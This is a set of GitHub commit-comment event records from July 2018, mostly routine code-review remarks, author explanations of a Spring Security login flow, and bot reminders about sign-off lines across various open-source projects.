{"id":"7998957838","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789355,"position":22,"line":41,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:47:24Z","updated_at":"2018-07-21T17:47:24Z","author_association":"OWNER","body":"nếu Null thì báo lỗi"}},"created_at":"2018-07-21T17:47:24Z"}
{"id":"7998958017","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789356,"position":23,"line":42,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:47:32Z","updated_at":"2018-07-21T17:47:32Z","author_association":"OWNER","body":"add tin nhắn lỗi"}},"created_at":"2018-07-21T17:47:32Z"}
{"id":"7998958260","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789357,"position":39,"line":59,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:47:43Z","updated_at":"2018-07-21T17:47:43Z","author_association":"OWNER","body":"trang chuyển đổi"}},"created_at":"2018-07-21T17:47:43Z"}
{"id":"7998958305","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789358,"position":106,"line":115,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:47:45Z","updated_at":"2018-07-21T17:47:45Z","author_association":"COLLABORATOR","body":"You repeat the String `\"pt_assistant.substitute-platformway-relation\"` several times on this file. Use a constant for it instead (and for all other places where it is used).\r\n\r\nYou can create a new Class that only holds the constants for your preferences (e.g. `PublicTransportPreferences`)."}},"created_at":"2018-07-21T17:47:45Z"}
{"id":"7998958547","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29789359,"position":21,"line":17,"path":"ticketing/views/ActiveTicket.py","commit_id":"4aa365d82c70a8c7b2e48f7f86f716a7530f0bdd","created_at":"2018-07-21T17:47:58Z","updated_at":"2018-07-21T17:47:58Z","author_association":"COLLABORATOR","body":"How does this indexing work?\r\nWhat is user_data[1] and user_data[1][0]?"}},"created_at":"2018-07-21T17:47:58Z"}
{"id":"7998959328","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789360,"position":52,"line":79,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:48:31Z","updated_at":"2018-07-21T17:48:31Z","author_association":"OWNER","body":"Nếu Role User thì không có quyền đăng nhập vào phần Admin thì sẽ cảnh báo accessDenied"}},"created_at":"2018-07-21T17:48:31Z"}
{"id":"7998959556","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789361,"position":58,"line":85,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:48:43Z","updated_at":"2018-07-21T17:48:43Z","author_association":"OWNER","body":"Test các đường dẫn"}},"created_at":"2018-07-21T17:48:43Z"}
{"id":"7998959794","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789362,"position":69,"line":96,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:48:55Z","updated_at":"2018-07-21T17:48:55Z","author_association":"OWNER","body":"Logout quyền đăng nhập"}},"created_at":"2018-07-21T17:48:55Z"}
{"id":"7998960202","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29789363,"position":26,"line":26,"path":"ticketing/views/ActiveTicket.py","commit_id":"25277c26be5b51a944d4f5839f0f0b3cc9910b70","created_at":"2018-07-21T17:49:16Z","updated_at":"2018-07-21T17:49:16Z","author_association":"COLLABORATOR","body":"What is an UnboundLocalError? When does that exception get thrown?"}},"created_at":"2018-07-21T17:49:16Z"}
{"id":"7998960704","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789364,"position":27,"line":27,"path":"FinalProject/src/main/java/com/dxc/security/CustomAuthenticationProvider.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:49:41Z","updated_at":"2018-07-21T17:49:41Z","author_association":"OWNER","body":"Lấy thông tin Username vs Password trên form về xử lý (Important)"}},"created_at":"2018-07-21T17:49:41Z"}
{"id":"7998960760","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789365,"position":107,"line":116,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:49:44Z","updated_at":"2018-07-21T17:49:44Z","author_association":"COLLABORATOR","body":"If you want default values, have a look at the `BooleanPreference` class.\r\n\r\nTo use it, create a public static final field:\r\n```\r\npublic static final BooleanProperty MY_PREF = new BooleanProperty(\"pt_assistant.substitute-platformway-relation\", true);\r\n```\r\n\r\nThen always access the preference using `MY_PREF.get()`. You don't need to set default values then."}},"created_at":"2018-07-21T17:49:44Z"}
{"id":"7998961229","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789366,"position":30,"line":30,"path":"FinalProject/src/main/java/com/dxc/security/CustomAuthenticationProvider.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:50:08Z","updated_at":"2018-07-21T17:50:08Z","author_association":"OWNER","body":"Danh Sách cái Role, k để String đk vì cấu hình nó v, 1 user có nhìu role"}},"created_at":"2018-07-21T17:50:08Z"}
{"id":"7998961906","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789372,"position":34,"line":34,"path":"FinalProject/src/main/java/com/dxc/security/CustomAuthenticationProvider.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:50:37Z","updated_at":"2018-07-21T17:50:37Z","author_association":"OWNER","body":"kiểm tra, hợp lệ đúng, cái này áp dụng lên database, nên đa người dùng"}},"created_at":"2018-07-21T17:50:37Z"}
{"id":"7998962052","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"BO41/phpmyadmin"},"payload":{"comment":{"id":29789373,"position":null,"line":null,"path":null,"commit_id":"30b46fe65275335fc6948416999c5eac8ceb7ed6","created_at":"2018-07-21T17:50:45Z","updated_at":"2018-07-21T17:50:45Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-21T17:50:45Z"}
{"id":"7998962309","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789374,"position":46,"line":46,"path":"FinalProject/src/main/java/com/dxc/security/CustomAuthenticationProvider.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:50:57Z","updated_at":"2018-07-21T17:50:57Z","author_association":"OWNER","body":"nếu tất cả oke hết, thì return ra 1 user, có tên có quyền "}},"created_at":"2018-07-21T17:50:57Z"}
{"id":"7998962333","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789375,"position":128,"line":139,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:50:59Z","updated_at":"2018-07-21T17:50:59Z","author_association":"COLLABORATOR","body":"Use `optionsForMendAction.setSelected(Main.pref.getBoolean(\"pt_assistant.keep-options-numerical-in-mend-action\")))`\r\n\r\nOr after converting to properties: `optionsForMendAction.setSelected(KEEP_OPTIONS_NUMERICAL_IN_MED_ACTION.get())`"}},"created_at":"2018-07-21T17:50:59Z"}
{"id":"7998962729","type":"CommitCommentEvent","actor":{"login":"domingohui"},"repo":{"name":"e26zhang/tf-ultimate-tic-tac-toe"},"payload":{"comment":{"id":29789377,"position":null,"line":null,"path":null,"commit_id":"b9ee912bb0ce82a24e795ac7f65b5d137f3b779d","created_at":"2018-07-21T17:51:19Z","updated_at":"2018-07-21T17:51:19Z","author_association":"COLLABORATOR","body":"such wow!!"}},"created_at":"2018-07-21T17:51:19Z"}
{"id":"7998962822","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"BO41/phpmyadmin"},"payload":{"comment":{"id":29789379,"position":null,"line":null,"path":null,"commit_id":"fd99e3cc931f304121a3448baa02840c71f3f715","created_at":"2018-07-21T17:51:23Z","updated_at":"2018-07-21T17:51:23Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-21T17:51:23Z"}
{"id":"7998963048","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789381,"position":7,"line":7,"path":"FinalProject/src/main/webapp/WEB-INF/jsp/accessDenied.jsp","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:51:34Z","updated_at":"2018-07-21T17:51:34Z","author_association":"OWNER","body":"TRang cảnh báo đăng nhập"}},"created_at":"2018-07-21T17:51:34Z"}
{"id":"7998964552","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789384,"position":35,"line":154,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:52:49Z","updated_at":"2018-07-21T17:52:49Z","author_association":"COLLABORATOR","body":"You can use a stream for this:\r\n\r\n```\r\nnewStopPos.getParentWays().stream().flatMap(way -> getPTRouteParents(way).stream()).filter(r -> r.hasKey(\"route\")).forEach(r -> tagsForNode.put(r.get(\"route\"), \"yes\"))\r\n```"}},"created_at":"2018-07-21T17:52:49Z"}
{"id":"7998964711","type":"CommitCommentEvent","actor":{"login":"rain-1"},"repo":{"name":"rain-1/racket-peg"},"payload":{"comment":{"id":29789386,"position":null,"line":null,"path":null,"commit_id":"f28625767718f3812337fd192b44548bf4f0bc9d","created_at":"2018-07-21T17:52:57Z","updated_at":"2018-07-21T17:52:57Z","author_association":"OWNER","body":"Oh yeah, thanks for pointing it out! my mistake\r\n\r\n"}},"created_at":"2018-07-21T17:52:57Z"}
{"id":"7998964716","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"pcercuei/pioneer"},"payload":{"comment":{"id":29789387,"position":14,"line":14,"path":"flatpak/net.pioneerspacesim.Pioneer.json","commit_id":"6b44290eccd0c09fb8fe8829909f7f58be3b5a28","created_at":"2018-07-21T17:52:57Z","updated_at":"2018-07-21T17:52:57Z","author_association":"NONE","body":"Should be `--persist=.pioneer` (even better if it respected `$XDG_CONFIG_HOME`)."}},"created_at":"2018-07-21T17:52:57Z"}
{"id":"7998964782","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"tinkertim/StackCOC"},"payload":{"comment":{"id":29789388,"position":null,"line":null,"path":null,"commit_id":"260b75159c7713e279ba86637dfacbf4e2377d17","created_at":"2018-07-21T17:53:01Z","updated_at":"2018-07-21T17:53:01Z","author_association":"NONE","body":"#260751"}},"created_at":"2018-07-21T17:53:01Z"}
{"id":"7998965483","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789390,"position":89,"line":221,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:53:36Z","updated_at":"2018-07-21T17:53:36Z","author_association":"COLLABORATOR","body":"Use a better parameter name than `bool`."}},"created_at":"2018-07-21T17:53:36Z"}
{"id":"7998965655","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789391,"position":10,"line":10,"path":"FinalProject/src/main/webapp/WEB-INF/jsp/admin.jsp","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:53:46Z","updated_at":"2018-07-21T17:53:46Z","author_association":"OWNER","body":"TRang Logout "}},"created_at":"2018-07-21T17:53:46Z"}
{"id":"7998966024","type":"CommitCommentEvent","actor":{"login":"TheLonelySheep"},"repo":{"name":"JRoy/happybot"},"payload":{"comment":{"id":29789392,"position":null,"line":null,"path":null,"commit_id":"44179902014e59e3333f8de039c3b46244ad7f31","created_at":"2018-07-21T17:54:05Z","updated_at":"2018-07-21T17:54:05Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-21T17:54:05Z"}
{"id":"7998966070","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789393,"position":91,"line":223,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:54:07Z","updated_at":"2018-07-21T17:54:07Z","author_association":"COLLABORATOR","body":"This lime is common to both branches - pull it out."}},"created_at":"2018-07-21T17:54:07Z"}
{"id":"7998966171","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789395,"position":99,"line":231,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:54:12Z","updated_at":"2018-07-21T17:54:12Z","author_association":"COLLABORATOR","body":"This lime is common to both branches - pull it out."}},"created_at":"2018-07-21T17:54:12Z"}
{"id":"7998966229","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789396,"position":101,"line":233,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:54:15Z","updated_at":"2018-07-21T17:54:15Z","author_association":"COLLABORATOR","body":"This lime is common to both branches - pull it out."}},"created_at":"2018-07-21T17:54:15Z"}
{"id":"7998966301","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789397,"position":105,"line":237,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/AddStopPositionAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:54:19Z","updated_at":"2018-07-21T17:54:19Z","author_association":"COLLABORATOR","body":"This lime is common to both branches - pull it out."}},"created_at":"2018-07-21T17:54:19Z"}
{"id":"7998966408","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789398,"position":5,"line":4,"path":"FinalProject/src/main/webapp/WEB-INF/jsp/login.jsp","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:54:24Z","updated_at":"2018-07-21T17:54:24Z","author_association":"OWNER","body":"Đây là istl để dùng c:if, c:url"}},"created_at":"2018-07-21T17:54:24Z"}
{"id":"7998967101","type":"CommitCommentEvent","actor":{"login":"Vierwood"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29789400,"position":1227,"line":814,"path":"The_Seven_Kingdoms/common/laws/succession_laws.txt","commit_id":"aedf2135c6befe42190963415e8a2857e44abc16","created_at":"2018-07-21T17:55:01Z","updated_at":"2018-07-21T17:55:01Z","author_association":"COLLABORATOR","body":"@blackninja9939 yes, some of the laws were copied over. The vanilla files weren't fixing the issue (they should) so I fell back to something I knew would 100% work. The NW_government and de_facto issues are fixed in a forthcoming commit. "}},"created_at":"2018-07-21T17:55:01Z"}
{"id":"7998967844","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29789401,"position":9,"line":3691,"path":"dietpi/dietpi-software","commit_id":"37d3cb6dbc7c157e0e5a82eaf1a80bea2c384e0c","created_at":"2018-07-21T17:55:37Z","updated_at":"2018-07-21T17:55:37Z","author_association":"COLLABORATOR","body":"@Fourdee \r\nJep: https://github.com/Fourdee/DietPi/pull/1948 🙂\r\n\r\nI also found Koel needs PHP (php-cli) but no webserver. I remember there were more software titles with this behaviour, but have to go through it. Thus I implemented `aSOFTWARE_REQUIRES_PHP` to allow PHP installation without webserver and then have php-cli as base PHP package."}},"created_at":"2018-07-21T17:55:37Z"}
{"id":"7998968981","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789403,"position":199,"line":397,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/actions/CreatePlatformNodeAction.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:56:31Z","updated_at":"2018-07-21T17:56:31Z","author_association":"COLLABORATOR","body":"Use `BooleanProperty` instead."}},"created_at":"2018-07-21T17:56:31Z"}
{"id":"7998969198","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29789404,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T17:56:40Z","updated_at":"2018-07-21T17:56:40Z","author_association":"NONE","body":"как Ваше нечего? zgn))"}},"created_at":"2018-07-21T17:56:40Z"}
{"id":"7998970212","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789407,"position":76,"line":145,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/validation/SegmentChecker.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:57:30Z","updated_at":"2018-07-21T17:57:30Z","author_association":"COLLABORATOR","body":"... else if ..."}},"created_at":"2018-07-21T17:57:30Z"}
{"id":"7998972247","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29789409,"position":null,"line":null,"path":null,"commit_id":"06490c524e00aab9bd71391439c52fb04eb0be6b","created_at":"2018-07-21T17:59:12Z","updated_at":"2018-07-21T17:59:12Z","author_association":"COLLABORATOR","body":"Puzzle `1035-3b7a2d5a` disappeared from [`src/test/resources/com/zerocracy/bundles/elections_dont_exceed_max_jobs_option/_after.groovy`](https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/elections_dont_exceed_max_jobs_option/_after.groovy), that's why I closed #1187. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-21T17:59:12Z"}
{"id":"7998972781","type":"CommitCommentEvent","actor":{"login":"Leymooo"},"repo":{"name":"WaterfallMC/Waterfall"},"payload":{"comment":{"id":29789410,"position":26,"line":134,"path":"BungeeCord-Patches/0048-1.13-protocol-support.patch","commit_id":"b7a2ebe8f5f30dfbf4de3331ab8acf4fd044f898","created_at":"2018-07-21T17:59:39Z","updated_at":"2018-07-21T17:59:39Z","author_association":"NONE","body":">= ??"}},"created_at":"2018-07-21T17:59:39Z"}
{"id":"7998974748","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"BO41/phpmyadmin"},"payload":{"comment":{"id":29789419,"position":null,"line":null,"path":null,"commit_id":"bef91b6787337d161f7a54585bd9dfe34a258d7e","created_at":"2018-07-21T18:01:06Z","updated_at":"2018-07-21T18:01:06Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-21T18:01:06Z"}
{"id":"7998974836","type":"CommitCommentEvent","actor":{"login":"mjjunemann"},"repo":{"name":"negebauer/Siding"},"payload":{"comment":{"id":29789420,"position":null,"line":null,"path":null,"commit_id":"13ace34d5fc2973472a81270c722bf71d33617ab","created_at":"2018-07-21T18:01:10Z","updated_at":"2018-07-21T18:01:10Z","author_association":"NONE","body":"as dummy as you "}},"created_at":"2018-07-21T18:01:10Z"}
{"id":"7998975309","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789422,"position":14,"line":14,"path":"src/hdskins/java/com/voxelmodpack/hdskins/util/Optionals.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-21T18:01:34Z","updated_at":"2018-07-21T18:01:34Z","author_association":"MEMBER","body":"that's true for `orElseGet(Supplier<T>)`"}},"created_at":"2018-07-21T18:01:34Z"}
{"id":"7998975835","type":"CommitCommentEvent","actor":{"login":"nmorel"},"repo":{"name":"3amperes/desgranges"},"payload":{"comment":{"id":29789423,"position":null,"line":null,"path":null,"commit_id":"ad6e6db7c08a173d92542b99ab904a16eafe3a59","created_at":"2018-07-21T18:02:02Z","updated_at":"2018-07-21T18:02:02Z","author_association":"CONTRIBUTOR","body":"@wab J'ai changé la façon de faire. Je surcharge les liens gatsby pour faire la navigateTo qu'au milieu de la transition. Et ça simplifie tout :)  \r\nPlus de bug de scroll aussi. Si on fait back navigateur, c'est instantané avec la position du scroll conservé."}},"created_at":"2018-07-21T18:02:02Z"}
{"id":"7998976368","type":"CommitCommentEvent","actor":{"login":"amosonn"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29789424,"position":null,"line":null,"path":null,"commit_id":"aab4ffd664b77bd6afb85e8d5660da66a4bf1776","created_at":"2018-07-21T18:02:25Z","updated_at":"2018-07-21T18:02:25Z","author_association":"CONTRIBUTOR","body":"I planned to put the whole discussion about words somewhere else, see the title \"Words are based on common experiences\" in the contents (still unwritten). However I agree I can give a brief overview here, something more concrete than the vague \"will be discussed\". But I don't want to digress from the main point here, which is the fundamental limitation of holding a different perspective."}},"created_at":"2018-07-21T18:02:25Z"}
{"id":"7998976947","type":"CommitCommentEvent","actor":{"login":"alvaroaxo"},"repo":{"name":"alvaroaxo/BS-web"},"payload":{"comment":{"id":29789425,"position":4,"line":24,"path":"footer.php","commit_id":"e07483937b4c854cd42040b6abe9ecacba1d3f16","created_at":"2018-07-21T18:02:51Z","updated_at":"2018-07-21T18:02:51Z","author_association":"OWNER","body":"Designed? o Powered? que opinas?"}},"created_at":"2018-07-21T18:02:51Z"}
{"id":"7998980264","type":"CommitCommentEvent","actor":{"login":"Luis1401"},"repo":{"name":"alvaroaxo/BS-web"},"payload":{"comment":{"id":29789427,"position":4,"line":24,"path":"footer.php","commit_id":"e07483937b4c854cd42040b6abe9ecacba1d3f16","created_at":"2018-07-21T18:05:21Z","updated_at":"2018-07-21T18:05:21Z","author_association":"COLLABORATOR","body":"Mas bien tu que decis? Tal ves Powered\n\nEl sáb., 21 de jul. de 2018 14:02, alvaroaxo <notifications@github.com>\nescribió:\n\n> Designed? o Powered? que opinas?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/alvaroaxo/BS-web/commit/e07483937b4c854cd42040b6abe9ecacba1d3f16#commitcomment-29789425>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AlEpmRLrFmgddKx5ueOkwvqrX8hGswggks5uI2zLgaJpZM4VZtdV>\n> .\n>\n"}},"created_at":"2018-07-21T18:05:21Z"}
{"id":"7998981753","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29789430,"position":17,"line":547,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/GuiSkins.java","commit_id":"bbff6ceaabab24d022f9e2b1ee4cb0ab18434407","created_at":"2018-07-21T18:06:31Z","updated_at":"2018-07-21T18:06:31Z","author_association":"MEMBER","body":"it's literally just whendone, whenfailed. Callbacks like this are needed when doing off-thread network stuff"}},"created_at":"2018-07-21T18:06:31Z"}
{"id":"7998981944","type":"CommitCommentEvent","actor":{"login":"mbeacom"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29789432,"position":13,"line":905,"path":"app/dashboard/models.py","commit_id":"40294511f3c12ef1d03f24d67bd0899e3eec51cb","created_at":"2018-07-21T18:06:40Z","updated_at":"2018-07-21T18:06:40Z","author_association":"MEMBER","body":"@owocki Which of these methods do we want to use here?  Looks like we're redefining `amount_in_wei` and `amount_in_whole_units`"}},"created_at":"2018-07-21T18:06:40Z"}
{"id":"7998983540","type":"CommitCommentEvent","actor":{"login":"skonto"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":29789442,"position":36,"line":124,"path":"resource-managers/kubernetes/integration-tests/src/test/scala/org/apache/spark/deploy/k8s/integrationtest/KubernetesTestComponents.scala","commit_id":"f1a99ad5825daf1b4cc275146ba8460cbcdf9701","created_at":"2018-07-21T18:07:55Z","updated_at":"2018-07-21T18:07:55Z","author_association":"CONTRIBUTOR","body":"@ifilonenko I am afraid this introduces the same bug again I fixed in https://github.com/apache/spark/commit/e71e93aaaa0d26301e10d3dc65f4db298424e99a#diff-35d296258fe428d700849f986ce45832"}},"created_at":"2018-07-21T18:07:55Z"}
{"id":"7998983685","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789443,"position":23,"line":43,"path":"FinalProject/src/main/webapp/WEB-INF/jsp/login.jsp","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T18:08:02Z","updated_at":"2018-07-21T18:08:02Z","author_association":"OWNER","body":"thay đổi update cái cũ"}},"created_at":"2018-07-21T18:08:02Z"}
{"id":"7998984167","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789444,"position":1,"line":1,"path":"FinalProject/src/main/webapp/WEB-INF/spring-security.xml","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T18:08:26Z","updated_at":"2018-07-21T18:08:26Z","author_association":"OWNER","body":"file cấu hình security"}},"created_at":"2018-07-21T18:08:26Z"}
{"id":"7998986341","type":"CommitCommentEvent","actor":{"login":"RaviParamasivan"},"repo":{"name":"RaviParamasivan/rabobank-backend"},"payload":{"comment":{"id":29789448,"position":57,"line":39,"path":"src/main/java/com/rabobank/processor/statement/StatementProcessorImpl.java","commit_id":"25ae86dd3274d039a28fd2cc8a8a893afc6f86e3","created_at":"2018-07-21T18:10:16Z","updated_at":"2018-07-21T18:10:16Z","author_association":"OWNER","body":"Done\n"}},"created_at":"2018-07-21T18:10:16Z"}
{"id":"7998986806","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789449,"position":16,"line":37,"path":"FinalProject/src/main/webapp/WEB-INF/jsp/login.jsp","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T18:10:41Z","updated_at":"2018-07-21T18:10:41Z","author_association":"OWNER","body":"báo lỗi : Nếu User va Password khong ton tai tren database"}},"created_at":"2018-07-21T18:10:41Z"}
{"id":"7998987235","type":"CommitCommentEvent","actor":{"login":"nuttaruj"},"repo":{"name":"nuttaruj/Woo-Line-Notify"},"payload":{"comment":{"id":29789450,"position":null,"line":null,"path":null,"commit_id":"8d365b4766b063e5f1f39055fa1eedae5666cbfe","created_at":"2018-07-21T18:11:04Z","updated_at":"2018-07-21T18:11:04Z","author_association":"OWNER","body":"1.0.4"}},"created_at":"2018-07-21T18:11:04Z"}
